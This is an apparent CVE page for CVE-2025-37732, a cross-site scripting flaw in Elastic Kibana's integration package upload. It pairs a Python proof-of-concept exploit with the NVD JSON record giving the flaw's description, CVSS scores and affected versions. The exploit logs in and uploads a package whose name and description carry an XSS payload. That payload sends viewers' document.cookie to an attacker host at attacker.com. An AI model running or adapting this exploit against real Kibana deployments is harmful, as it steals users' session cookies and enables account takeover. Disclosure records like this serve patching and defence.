CVE-2025-37732

import requests import json # CVE-2025-37732 PoC - Kibana XSS via Integration Package Upload # Target: Elastic Kibana < 8.19.8, < 9.1.8, < 9.2.2 TARGET_URL = "http://target-kibana:5601" USERNAME = "attacker_user" PASSWORD = "password" def get_auth_token(): """Authenticate and get session token""" login_url = f"{TARGET_URL}/api/security/v1/login" data = {"username": USERNAME, "password": PASSWORD} response = requests.post(login_url, json=data) return response.cookies def upload_malicious_package(cookies): """Upload integration package with XSS payload""" upload_url = f"{TARGET_URL}/api/fleet/epm/packages" # XSS payload in package name/description payload = '<img src=x onerror="fetch(`https://attacker.com/steal?c="+document.cookie)">' package_data = { "name": f"malicious-package-{payload}", "version": "1.0.0", "description": f"Package with {payload} injected" } headers = {"kbn-xsrf": "true"} response = requests.post( upload_url, json=package_data, cookies=cookies, headers=headers ) return response.status_code == 200 def main(): print("[*] CVE-2025-37732 PoC - Kibana Integration Package XSS") cookies = get_auth_token() if upload_malicious_package(cookies): print("[+] Malicious package uploaded successfully") print("[*] XSS will trigger when users view integration details") else: print("[-] Failed to upload package") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-37732", "sourceIdentifier": "[email protected]", "published": "2025-12-15T11:15:39.860", "lastModified": "2025-12-18T01:45:36.753", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper neutralization of input during web page generation ('Cross-site Scripting') (CWE-79) allows an authenticated user to render HTML tags within a user’s browser via the integration package upload functionality. This issue is related to ESA-2025-17 (CVE-2025-25018) bypassing that fix to achieve HTML injection."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0.0", "versionEndIncluding": "7.17.29", "matchCriteriaId": "8820B4BC-0DAB-4C9B-8053-90DE2C19646E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.0.0", "versionEndExcluding": "8.19.8", "matchCriteriaId": "BB564579-5F98-4F52-B32A-9B87C25DF71B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:*", "versionStartIncluding": "9.0.0", "versionEndExcluding": "9.1.8", "matchCriteriaId": "4CFE640F-1CCC-4580-AC29-5438EE33627C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:*", "versionStartIncluding": "9.2.0", "versionEndExcluding": "9.2.2", "matchCriteriaId": "C4429C9D-7DA5-4F27-B0AB-92F8D6F077CE"}]}]}], "references": [{"url": "https://discuss.elastic.co/t/kibana-8-19-8-9-1-8-and-9-2-2-security-update-esa-2025-28/384064", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}